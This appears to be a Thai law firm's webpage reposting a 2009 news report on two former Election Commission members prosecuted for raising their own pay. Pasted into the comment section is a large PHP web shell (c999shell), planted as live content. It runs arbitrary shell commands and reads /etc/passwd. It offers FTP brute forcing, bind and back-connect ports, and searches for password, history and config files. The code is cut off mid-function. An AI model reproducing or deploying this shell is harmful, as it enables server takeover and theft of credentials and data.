คดีทุจริตคอรัปชั่น/ป.ป.ช./อดีต กกต.ขึ้นเงินเดือนตัวเอง |คดีทุจริตคอรัปชั่น/ป.ป.ช./อดีต กกต.ขึ้นเงินเดือนตัวเอง

คดีทุจริตคอรัปชั่น/ป.ป.ช./อดีต กกต.ขึ้นเงินเดือนตัวเอง

  • ทนายคลายทุกข์ ปรึกษากฎหมาย โทร 02-9485700
  • Email: [email protected]
Header Background Image

งานเผยแพร่ความรู้ทางด้าน กฎหมาย การบริหารการจัดการหนี้สินในองค์กรภาครัฐและภาคเอกชน การฝึกอบรมสัมมนาพัฒนาบุคลากร ในการประกอบธุรกิจ หากหน่วยงานของรัฐ บริษัทห้างร้าน มีความสนใจ เชิญทีมงานไปฝึกอบรมสัมมนาหรือต้องการข้อมูลข่าวสาร ติดต่อได้ที่ 02-948-5700 อ่านต่อ

ท่านใดที่สนใจเกี่ยวกับหลักสูตรฝึกอบรมการติดตามหนี้ ทวงหนี้อย่างไรให้ได้ผล ได้เงิน รักษาภาพลักษณ์ รักษาลูกค้า/หลักสูตรการป้องกันและการปราบปรามการทุจริตภายในองค์กร/หลักสูตรกฎหมายแรงงาน สำหรับเจ้าหน้าที่ฝ่ายบุคคลหรือผู้บริหารบริษัท สนใจโทร.02-9485700 อ่านต่อ

สืบทุกเรื่องที่คุณอยากรู้ มีเรื่องคาใจอยากรู้ความจริง โทรมาคุยกับกุ้งได้ที่ 081-625-2161หรือ 089-669-5026 "อย่าปล่อยให้มีเรื่องคาใจ อะไรที่ไม่สบายใจ ต้องหาทางปลดปล่อย สืบให้รู้ความจริง จะได้จบสิ้นกันเสียที สำหรับความทุกข์ที่คาใจมาเป็นเวลานาน อย่าปล่อยให้คนนอกใจลอยนวล" อ่านต่อ

รับแปลเอกสารต่างๆ อ่านต่อ

คดีทุจริตคอรัปชั่น/ป.ป.ช./อดีต กกต.ขึ้นเงินเดือนตัวเอง

ทนายคลายทุกข์ขอนำข่าวเกี่ยวกับการทุจริตคอรัปชั่นของ 2 อดีตคณะกรรมการการเลือกตั้ง

บทความวันที่ 1 ก.ย. 2552, 00:00

มีผู้อ่านทั้งหมด 30817 ครั้ง


คดีทุจริตคอรัปชั่น/ป.ป.ช./อดีต กกต.ขึ้นเงินเดือนตัวเอง

 

            ทนายคลายทุกข์ขอนำข่าวเกี่ยวกับการทุจริตคอรัปชั่นของ 2 อดีตคณะกรรมการการเลือกตั้งในความผิดฐานเป็นเจ้าพนักงานร่วมกันปฏิบัติหน้าที่โดยมิชอบเพื่อให้เกิดความเสียหายแก่ผู้หนึ่งผู้ใดและปฏิบัติหน้าที่โดยทุจริต  อัยการสั่งฟ้อง “ปริญญา นาคฉัตรีย์ - วีระชัย แนวบุญเนียร” อดีต กกต.ปฏิบัติหน้าที่มิชอบ มาตรา 157 กรณีออกระเบียบขึ้นเงินเดือนตัวเองแล้ว ก่อนได้ประกันตัวโดยศาลตีราคาประกันคนละ 1.2 แสนบาท พร้อมนัดพยานตรวจหลักฐาน 12 ต.ค.นี้ ส่วน “อดีต ปธ.กกต.-จารุภัทร” อัยการระบุอยู่ระหว่างแจ้งหมายให้ ป.ป.ช.เอาตัวมาส่งฟ้องอีกครั้ง
      
       วันนี้ (31 ส.ค.) ที่ศาลอาญา ถ.รัชดาภิเษก พนักงานอัยการฝ่ายคดีพิเศษ 5 เป็นโจทก์ยื่นฟ้อง นายปริญญา นาคฉัตรีย์ อายุ 65 ปี และ นายวีระชัย แนวบุญเนียร อายุ 60 ปี อดีตคณะกรรมการการเลือกตั้ง เป็นจำเลยที่ 1-2 ในความผิดฐานเป็นเจ้าพนักงานร่วมกันปฏิบัติหน้าที่โดยมิชอบเพื่อให้เกิดความเสียหายแก่ผู้หนึ่งผู้ใดและปฏิบัติหน้าที่โดยทุจริต ตาม ป.อาญา ม.157 ประกอบ ม.83 และ พ.ร.บ.ว่าด้วยการป้องกันและปราบปรามการทุจริต พ.ศ. 2542 ม.4
      
       ตามฟ้องโจทก์สรุปว่า พล.ต.อ.วาสนา เพิ่มลาภ อดีตประธาน กกต.และ พล.อ.จารุภัทร เรืองสุวรรณ อดีต กกต.ซึ่งยังไม่ได้ตัวมาฟ้อง นายจรัล บูรณะพันธุ์ศรี อดีต กกต.ซึ่งเสียชีวิตแล้ว และจำเลยทั้งสอง ซึ่งเป็นกรรมการในหน่วยงานของรัฐตาม ม.4 พ.ร.บ.ว่าด้วย ป.ป.ช.และตาม พ.ร.บ.ว่าด้วย กกต.พ.ศ.2541 ร่วมกันปฏิบัติหน้าที่โดยมิชอบและโดยทุจริต โดยเมื่อวันที่ 16 ส.ค.2547 จำเลยกับพวกร่วมกันประชุม กกต.แล้วมีมติเห็นชอบร่างระเบียบ กกต.ว่าด้วยการจ่ายเงินเพิ่มพิเศษของประธาน กรรมการ และ กกต.พ.ศ.2547 และให้ พล.ต.อ.วาสนา ประธาน กกต.ขณะนั้นออกระเบียบ กกต.ว่าด้วยหลักเกณฑ์และวิธีการจ่ายค่าตอบแทนการปฏิบัติงานของ กกต. พ.ศ.2547 กำหนดเงินค่าตอบแทนการปฏิบัติหน้าที่ลักษณะเหมาจ่ายเป็นรายเดือนให้กับจำเลยกับพวกเดือนละ 20,000 บาท โดยให้ใช้บังคับย้อนหลังไปตั้งแต่วันที่ 1 เม.ย.2547 เป็นต้นไป ทั้งที่จำเลยทั้งสองกับพวกไม่มีสิทธิได้รับเงินดังกล่าวโดยชอบด้วยกฎหมาย
      
       ต่อมาวันที่ 3 ก.ย.2547 พล.ต.อ.วาสนา ประธาน กกต.ได้ลงนามออกในระเบียบ กกต.ว่าด้วยหลักเกณฑ์และวิธีการจ่ายค่าตอบแทนการปฏิบัติงานของ กกต.พ.ศ.2547 ฉบับลงวันที่ 3 ก.ย.47 อันเป็นการมีมติออกระเบียบที่ไม่ชอบด้วยกฎหมาย และในวันที่ 6 ก.ย.2547 จำเลยกับพวกยังได้ประชุมแก้ไขระเบียบดังกล่าวในข้อ 2 จากเดิม “ระเบียบนี้ให้ใช้บังคับตั้งแต่วันที่ 1 เม.ย.2547 เป็นต้นไป” แก้เป็น “ระเบียบนี้ให้ใช้บังคับตั้งแต่วันที่ 1 ก.ย.2547 เป็นต้นไป” จากนั้นในวันที่ 13 ก.ย.2547 พล.ต.อ.วาสนา ยังได้ลงนามออกระเบียบ กกต.ว่าด้วยหลักเกณฑ์และวิธีการจ่ายค่าตอบแทนการปฏิบัติงานของ กกต.พ.ศ.2547 ฉบับลงวันที่ 13 ก.ย.2547 โดยแก้ไขข้อความในระเบียบเดิม กระทั่งวันที่ 28 ก.ย.2547 จำเลยกับพวกได้อาศัยระเบียบดังกล่าวรับเงินค่าตอบแทนไปจากสำนักงาน กกต.คนละ 20,000 บาท ร่วมเป็นเงิน 100,000 บาท เหตุเกิดที่สำนักงาน กกต.อาคารศรีจุลทรัพย์ แขวงรองเมือง เขตปทุมวัน กทม.โดยจำเลยกับพวกทั้งหมด ได้ส่งเงินคืนต่อสำนักงาน กกต. ขณะที่ชั้นไต่สวนของ คณะกรรมการ ป.ป.ช.จำเลยทั้งสองให้การปฏิเสธ โดยโจทก์ขอให้ศาลพิพากษาลงโทษจำเลยทั้งสอง และนับโทษจากคดีที่ศาลอาญาพิพากษาจำคุกจำเลยทั้งสองในคดีทุจริตจัดการเลือกตั้ง ส.ส.ทั่วไป เมื่อวันที่ 2 เม.ย.49 รวม 2 สำนวน รวม 6 ปี
      
       โดยศาลประทับรับฟ้องไว้เป็นหมายเลขดำที่ อ.3015/2552 และนัดตรวจพยานหลักฐานวันที่ 12 ต.ค.นี้ เวลา 09.00 น.ต่อมาญาติ นายปริญญา และญาติ นายวีระชัย ได้ยื่นคำร้องพร้อมหลักทรัพย์เป็นเงินสดคนละ 120,000 บาท ขอประกันตัว ศาลพิเคราะห์แล้วอนุญาตให้ปล่อยตัวชั่วคราว โดยตีราคาประกันคนละ 120,000 บาท
      
       ส่วน พล.ต.อ.วาสนา อดีตประธาน กกต. และ พล.อ.จารุภัทร อดีต กกต. และกลุ่มอดีตตุลาการศาลรัฐธรรมรวม 13 คน ชุดที่มีนายกระมล ทองธรรมชาติ เป็นประธานและคณะผู้ตรวจการแผ่นดินรัฐสภา 3 คน ชุดที่มี พล.อ.ธีรเดช มีเพียร เป็นประธาน ซึ่งอัยการสูงสุดมีความเห็นสั่งฟ้องด้วยนั้น
      
       นายเศกสรรค์ บางสมบุญ อธิบดีอัยการฝ่ายคดีพิเศษ กล่าวว่า อัยการฝ่ายคดีพิเศษ มีหนังสือแจ้งให้ ป.ป.ช.ทราบ และแจ้งหมายให้ผู้ถูกกล่าวทั้งหมดทราบเพื่อรายงานตัวต่ออัยการในการยื่นฟ้องคดีต่อศาลอาญาแล้ว อย่างไรก็ดี ขณะนี้อัยการยังไม่ได้กำหนดวันว่าจะยื่นฟ้องเมื่อใด เนื่องจากต้องรอว่า ป.ป.ช.ดำเนินกระบวนการแจ้งหมายให้ผู้ถูกกล่าวหาทราบก่อน ซึ่งกฎหมายไม่ได้กำหนดเวลาว่าจะใช้เวลาภายในกี่วันในการอส่งตัวผู้ถูกกล่าวหา
      
       นายเศกสรรค์ อธิบดีอัยการฝ่ายคดีพิเศษ กล่าวว่า สำหรับเหตุที่คดีของอดีตตุลาการศาลรัฐธรรมนูญ อดีต กกต. และผู้ตรวจการแผ่นดิน ไม่ได้ยื่นฟ้องต่อศาลฎีกาแผนกคดีอาญาของผู้ดำรงตำแหน่งทางการเมือง เหมือนคดีที่ ป.ป.ช.ชุดที่มี พล.ต.อ.วุฑฒิชัย ศรีรัตนวุฑฒิ รวม 9 คน เป็นจำเลยในความผิดตามมาตรา 157 ที่ออกระเบียบขึ้นเงินเดือนตัวเองเมื่อปี 2548 นั้น เนื่องจากตามกฎหมายระบุว่านอกจาก ป.ป.ช.แล้ว องค์กรที่กระทำผิดให้ยื่นฟ้องคดีศาลอาญา
       
       ผู้สื่อข่าวรายงานว่า สำหรับคำสั่งให้ฟ้องดังกล่าว อัยการมีความเห็นตามที่ ป.ป.ช.ชี้มูลความผิด และพิจารณาจากแนวทางคดีที่ศาลฎีกาแผนกคดีอาญาของผู้ดำรงตำแหน่งทางการเมือง มีคำพิพากษาให้จำคุกประธานและกรรม ป.ป.ช.ทั้งคณะ 9 คน ชุดที่มี พล.ต.อ.วุฑฒิชัย ศรีรัตนวุฑฒิ เป็นประธาน เป็นเวลาคนละ 2 ปี ในความผิดฐานปฏิบัติหน้าที่มิชอบ แต่โทษจำคุกจึงให้รอลงอาญา 2 ปี ซึ่งคดีดังกล่าวถึงที่สุดตามคำพิพากษา อย่างไรก็ดี ความผิดตาม มาตรา 157 นั้น มีอัตราโทษจำคุก 1-10 หรือ ปรับ 2,000-20,000 บาท หรือทั้งจำทั้งปรับ
 

 
ขอขอบคุณรายงานข่าวจากหนังสือพิมพ์ผู้จัดการ

ความคิดเห็น

ความคิดเห็นที่ 4

 <?php

//Starting calls

if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}

error_reporting(5);

@ignore_user_abort(TRUE);

@set_magic_quotes_runtime(0);

$win = strtolower(substr(PHP_OS,0,3)) == "win";

define("starttime",getmicrotime());

if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}

$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);

foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

$shver = "1.0 pre-release build #16"; //Current version

//CONFIGURATION AND SETTINGS

if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}

elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}

else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL

}

$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.

if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

if (empty($surl))

{

$surl = "?".$includestr; //Self url

}

$surl = htmlspecialchars($surl);

$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.

//Authentication

$login = ""; //login

//DON\'T FORGOT ABOUT PASSWORD!!!

$pass = ""; //password

$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")

$login_txt = "Restricted area"; //http-auth message.

$accessdeniedmess = "<a href=\\"http://ccteam.ru/releases/c999shell\\">c999shell v.".$shver."</a>: access denied";

$gzipencode = TRUE; //Encode with gzip?

$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)

$ax4 ="http://";

$c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server

$c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server

$filestealth = TRUE; //if TRUE, don\'t change modify- and access-time

$donated_html = "<center><b>Owned by hacker</b></center>";

/* If you publish free shell and you wish

add link to your site or any other information,

put here your html. */

$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.

$curdir = "./"; //start folder

//$curdir = getenv("DOCUMENT_ROOT");

$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)

$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)

$log_email = "[email protected]"; //Default e-mail for sending logs

$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending

$sort_save = TRUE; //If TRUE then save sorting-position using cookies.

// Registered file-types.

// array(

// "{action1}"=>array("ext1","ext2","ext3",...),

// "{action2}"=>array("ext4","ext5","ext6",...),

// ...

// )

$ftypes = array(

"html"=>array("html","htm","shtml"),

"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),

"exe"=>array("sh","install","bat","cmd"),

"ini"=>array("ini","inf"),

"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),

"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),

"sdb"=>array("sdb"),

"phpsess"=>array("sess"),

"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")

);

// Registered executable file-types.

// array(

// string "command{i}"=>array("ext1","ext2","ext3",...),

// ...

// )

// {command}: %f% = filename

$exeftypes = array(

getenv("PHPRC")." -q %f%" => array("php","php3","php4"),

"perl %f%" => array("pl","cgi")

);

/* Highlighted files.

array(

i=>array({regexp},{type},{opentag},{closetag},{break})

...

)

string {regexp} - regular exp.

int {type}:

0 - files and folders (as default),

1 - files only, 2 - folders only

string {opentag} - open html-tag, e.g. "<b>" (default)

string {closetag} - close html-tag, e.g. "</b>" (default)

bool {break} - if TRUE and found match then break

*/

$regxp_highlight = array(

array(basename($_SERVER["PHP_SELF"]),1,"<font color=\\"yellow\\">","</font>"), // example

array("config.php",1) // example

);

$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.

// array (i=>{letter} ...); string {letter} - letter of a drive

//$safemode_diskettes = range("a","z");

$hexdump_lines = 8;// lines in hex preview file

$hexdump_rows = 24;// 16, 24 or 32 bytes in one line

$cx7 =".com";

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = "c999"; // default password for binding

$bindport_port = "31373"; // default port for binding

$bc_port = "31373"; // default port for back-connect

$cx4 ="/x.";

$datapipe_localport = "8081"; // default port for datapipe

// Command-aliases

if (!$win)

{

$cmdaliases = array(

array("-----------------------------------------------------------", "ls -la"),

array("find all suid files", "find / -type f -perm -04000 -ls"),

array("find suid files in current dir", "find . -type f -perm -04000 -ls"),

array("find all sgid files", "find / -type f -perm -02000 -ls"),

array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),

array("find config.inc.php files", "find / -type f -name config.inc.php"),

array("find config* files", "find / -type f -name \\"config*\\""),

array("find config* files in current dir", "find . -type f -name \\"config*\\""),

array("find all writable folders and files", "find / -perm -2 -ls"),

array("find all writable folders and files in current dir", "find . -perm -2 -ls"),

array("find all service.pwd files", "find / -type f -name service.pwd"),

array("find service.pwd files in current dir", "find . -type f -name service.pwd"),

array("find all .htpasswd files", "find / -type f -name .htpasswd"),

array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),

array("find all .bash_history files", "find / -type f -name .bash_history"),

array("find .bash_history files in current dir", "find . -type f -name .bash_history"),

array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),

array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),

array("list file attributes on a Linux second extended file system", "lsattr -va"),

array("show opened ports", "netstat -an | grep -i listen")

);

}

else

{

$cmdaliases = array(

array("-----------------------------------------------------------", "dir"),

array("show opened ports", "netstat -an")

);

}

$sess_cookie = "c999shvars"; // Cookie-variable name

$usefsbuff = TRUE; //Buffer-function

$px7 ="html";

$copy_unset = FALSE; //Remove copied files from buffer after pasting

//Quick launch

$quicklaunch = array(

array("<img src=\\"".$surl."act=img&img=home\\" alt=\\"Home\\" height=\\"20\\" width=\\"20\\" border=\\"0\\">",$surl),

array("<img src=\\"".$surl."act=img&img=back\\" alt=\\"Back\\" height=\\"20\\" width=\\"20\\" border=\\"0\\">","#\\" onclick=\\"history.back(1)"),

array("<img src=\\"".$surl."act=img&img=forward\\" alt=\\"Forward\\" height=\\"20\\" width=\\"20\\" border=\\"0\\">","#\\" onclick=\\"history.go(1)"),

array("<img src=\\"".$surl."act=img&img=up\\" alt=\\"UPDIR\\" height=\\"20\\" width=\\"20\\" border=\\"0\\">",$surl."act=ls&d=%upd&sort=%sort"),

array("<img src=\\"".$surl."act=img&img=refresh\\" alt=\\"Refresh\\" height=\\"20\\" width=\\"17\\" border=\\"0\\">",""),

array("<img src=\\"".$surl."act=img&img=search\\" alt=\\"Search\\" height=\\"20\\" width=\\"20\\" border=\\"0\\">",$surl."act=search&d=%d"),

array("<img src=\\"".$surl."act=img&img=buffer\\" alt=\\"Buffer\\" height=\\"20\\" width=\\"20\\" border=\\"0\\">",$surl."act=fsbuff&d=%d"),

array("<b>Encoder</b>",$surl."act=encoder&d=%d"),

array("<b>Tools</b>",$surl."act=tools&d=%d"),

array("<b>Proc.</b>",$surl."act=processes&d=%d"),

array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),

array("<b>Sec.</b>",$surl."act=security&d=%d"),

array("<b>SQL</b>",$surl."act=sql&d=%d"),

array("<b>PHP-code</b>",$surl."act=eval&d=%d"),

array("<b>Update</b>",$surl."act=update&d=%d"),

array("<b>Feedback</b>",$surl."act=feedback&d=%d"),

array("<b>Self remove</b>",$surl."act=selfremove"),

array("<b>Logout</b>","#\\" onclick=\\"if (confirm(\'Are you sure?\')) window.close()")

);

//Highlight-code colors

$highlight_background = "#c0c0c0";

$highlight_bg = "#FFFFFF";

$highlight_comment = "#6A6A6A";

$highlight_default = "#0000BB";

$highlight_html = "#1300FF";

$highlight_keyword = "#007700";

$highlight_string = "#000000";

@$f = $_REQUEST["f"];

@extract($_REQUEST["c999shcook"]);

//END CONFIGURATION

// \\/Next code isn\'t for editing\\/

@set_time_limit(0);

$tmp = array();

foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\\\*",".*",preg_quote($v));}

$s = "!^(".implode("|",$tmp).")$!i";

if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\\"http://ccteam.ru/releases/cc999shell\\">c999shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

if (!empty($login))

{

if (empty($md5_pass)) {$md5_pass = md5($pass);}

if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))

{

if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}

header("WWW-Authenticate: Basic realm=\\"c999shell ".$shver.": ".$login_txt."\\"");

header("HTTP/1.0 401 Unauthorized");

exit($accessdeniedmess);

}

}

if ($act != "img")

{

$lastdir = realpath(".");

chdir($curdir);

if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;}

$sess_data = unserialize($_COOKIE["$sess_cookie"]);

if (!is_array($sess_data)) {$sess_data = array();}

if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}

if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}

$disablefunc = @ini_get("disable_functions");

if (!empty($disablefunc))

{

$disablefunc = str_replace(" ","",$disablefunc);

$disablefunc = explode(",",$disablefunc);

}

if (!function_exists("c999_buff_prepare"))

{

function c999_buff_prepare()

{

global $sess_data;

global $act;

foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\\\",DIRECTORY_SEPARATOR,realpath($v));}

foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\\\",DIRECTORY_SEPARATOR,realpath($v));}

$sess_data["copy"] = array_unique($sess_data["copy"]);

$sess_data["cut"] = array_unique($sess_data["cut"]);

sort($sess_data["copy"]);

sort($sess_data["cut"]);

if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}

else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}

}

}

c999_buff_prepare();

if (!function_exists("c999_sess_put"))

{

function c999_sess_put($data)

{

global $sess_cookie;

global $sess_data;

c999_buff_prepare();

$sess_data = $data;

$data = serialize($data);

setcookie($sess_cookie,$data);

}

}

foreach (array("sort","sql_sort") as $v)

{

if (!empty($_GET[$v])) {$$v = $_GET[$v];}

if (!empty($_POST[$v])) {$$v = $_POST[$v];}

}

if ($sort_save)

{

if (!empty($sort)) {setcookie("sort",$sort);}

if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}

}

if (!function_exists("str2mini"))

{

function str2mini($content,$len)

{

if (strlen($content) > $len)

{

$len = ceil($len/2) - 2;

return substr($content, 0,$len)."...".substr($content,-$len);

}

else {return $content;}

}

}

if (!function_exists("view_size"))

{

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}

}

}

if (!function_exists("fs_copy_dir"))

{

function fs_copy_dir($d,$t)

{

$d = str_replace("\\\\",DIRECTORY_SEPARATOR,$d);

if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

$h = opendir($d);

while (($o = readdir($h)) !== FALSE)

{

if (($o != ".") and ($o != ".."))

{

if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

if (!$ret) {return $ret;}

}

}

closedir($h);

return TRUE;

}

}

if (!function_exists("fs_copy_obj"))

{

function fs_copy_obj($d,$t)

{

$d = str_replace("\\\\",DIRECTORY_SEPARATOR,$d);

$t = str_replace("\\\\",DIRECTORY_SEPARATOR,$t);

if (!is_dir(dirname($t))) {mkdir(dirname($t));}

if (is_dir($d))

{

if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}

return fs_copy_dir($d,$t);

}

elseif (is_file($d)) {return copy($d,$t);}

else {return FALSE;}

}

}

if (!function_exists("fs_move_dir"))

{

function fs_move_dir($d,$t)

{

$h = opendir($d);

if (!is_dir($t)) {mkdir($t);}

while (($o = readdir($h)) !== FALSE)

{

if (($o != ".") and ($o != ".."))

{

$ret = TRUE;

if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}

if (!$ret) {return $ret;}

}

}

closedir($h);

return TRUE;

}

}

if (!function_exists("fs_move_obj"))

{

function fs_move_obj($d,$t)

{

$d = str_replace("\\\\",DIRECTORY_SEPARATOR,$d);

$t = str_replace("\\\\",DIRECTORY_SEPARATOR,$t);

if (is_dir($d))

{

if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}

return fs_move_dir($d,$t);

}

elseif (is_file($d))

{

if(copy($d,$t)) {return unlink($d);}

else {unlink($t); return FALSE;}

}

else {return FALSE;}

}

}

if (!function_exists("fs_rmdir"))

{

function fs_rmdir($d)

{

$h = opendir($d);

while (($o = readdir($h)) !== FALSE)

{

if (($o != ".") and ($o != ".."))

{

if (!is_dir($d.$o)) {unlink($d.$o);}

else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}

}

}

closedir($h);

rmdir($d);

return !is_dir($d);

}

}

if (!function_exists("fs_rmobj"))

{

function fs_rmobj($o)

{

$o = str_replace("\\\\",DIRECTORY_SEPARATOR,$o);

if (is_dir($o))

{

if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}

return fs_rmdir($o);

}

elseif (is_file($o)) {return unlink($o);}

else {return FALSE;}

}

}

if (!function_exists("myshellexec"))

{

function myshellexec($cmd)

{

global $disablefunc;

$result = "";

if (!empty($cmd))

{

if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\\n",$result);}

elseif (($result = `$cmd`) !== FALSE) {}

elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

elseif (is_resource($fp = popen($cmd,"r")))

{

$result = "";

while(!feof($fp)) {$result .= fread($fp,1024);}

pclose($fp);

}

}

return $result;

}

}

if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}

if (!function_exists("view_perms"))

{

function view_perms($mode)

{

if (($mode & 0xC000) === 0xC000) {$type = "s";}

elseif (($mode & 0x4000) === 0x4000) {$type = "d";}

elseif (($mode & 0xA000) === 0xA000) {$type = "l";}

elseif (($mode & 0x8000) === 0x8000) {$type = "-";}

elseif (($mode & 0x6000) === 0x6000) {$type = "b";}

elseif (($mode & 0x2000) === 0x2000) {$type = "c";}

elseif (($mode & 0x1000) === 0x1000) {$type = "p";}

else {$type = "?";}

$owner["read"] = ($mode & 00400)?"r":"-";

$owner["write"] = ($mode & 00200)?"w":"-";

$owner["execute"] = ($mode & 00100)?"x":"-";

$group["read"] = ($mode & 00040)?"r":"-";

$group["write"] = ($mode & 00020)?"w":"-";

$group["execute"] = ($mode & 00010)?"x":"-";

$world["read"] = ($mode & 00004)?"r":"-";

$world["write"] = ($mode & 00002)? "w":"-";

$world["execute"] = ($mode & 00001)?"x":"-";

if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}

if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}

if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}

return $type.join("",$owner).join("",$group).join("",$world);

}

}

if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}

if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}

if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}

if (!function_exists("parse_perms"))

{

function parse_perms($mode)

{

if (($mode & 0xC000) === 0xC000) {$t = "s";}

elseif (($mode & 0x4000) === 0x4000) {$t = "d";}

elseif (($mode & 0xA000) === 0xA000) {$t = "l";}

elseif (($mode & 0x8000) === 0x8000) {$t = "-";}

elseif (($mode & 0x6000) === 0x6000) {$t = "b";}

elseif (($mode & 0x2000) === 0x2000) {$t = "c";}

elseif (($mode & 0x1000) === 0x1000) {$t = "p";}

else {$t = "?";}

$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;

$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;

$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;

